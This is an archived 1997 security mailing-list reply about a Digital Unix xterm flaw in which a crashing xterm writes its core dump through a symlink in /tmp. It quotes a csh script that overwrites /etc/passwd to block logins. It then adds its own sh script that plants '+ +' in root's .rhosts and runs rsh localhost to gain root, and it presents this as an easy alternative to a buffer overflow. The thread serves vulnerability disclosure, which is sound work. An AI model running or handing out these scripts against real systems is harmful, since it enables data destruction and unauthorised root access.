Re: Digital Unix Security Problem

Andrew Brown (codewarrior@daemon.org)
Thu, 13 Nov 1997 11:32:23 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Kragen \: "Re: Vunerability in Lizards game"
Previous message: dsiebert@ICAEN.UIOWA.EDU: "Re: Safe /tmp cleanup"
Maybe in reply to: Tom Leffingwell: "Digital Unix Security Problem"
Next in thread: Tom Leffingwell: "Re: Digital Unix Security Problem"

> Even with a buffer overflow, I've never seen anyone exploit on one
>DU. If anyone has done so sucessfully, plese email me. Despite that, a
>person with basic knowledge of unix could easily do something like:
>
>#/!bin/csh
>cd /tmp
>ln -s /etc/passwd /tmp/core
>setenv DISPLAY abcdefghi
>/usr/bin/X11/xterm
>
> The contents of /etc/passwd becomes xterm's core, preventing
>further logins. Obviously you could do things without an immediate impact
>such as ln -s /vmunix /tmp/core.

or...if the system you're on is actually running r-services, you could do

#!/bin/sh
DISPLAY="
+ +
"
export DISPLAY
cd /tmp
ln -s /.rhosts /tmp/core
/usr/bin/X11/xterm
rsh localhost

which sets the DISPLAY variable to an "admit all from all" line and
the core dump will go into root's .rhosts file. then all that remains
is the rsh localhost and you're all set!

considerably easier than a buffer overflow exploit...

--
|-----< "CODE WARRIOR" >-----|
andrew@echonyc.com (TheMan)        * "ah!  i see you have the internet
codewarrior@daemon.org                               that goes *ping*!"
warfare@graffiti.com      * "information is power -- share the wealth."

Next message: Kragen \: "Re: Vunerability in Lizards game"
Previous message: dsiebert@ICAEN.UIOWA.EDU: "Re: Safe /tmp cleanup"
Maybe in reply to: Tom Leffingwell: "Digital Unix Security Problem"
Next in thread: Tom Leffingwell: "Re: Digital Unix Security Problem"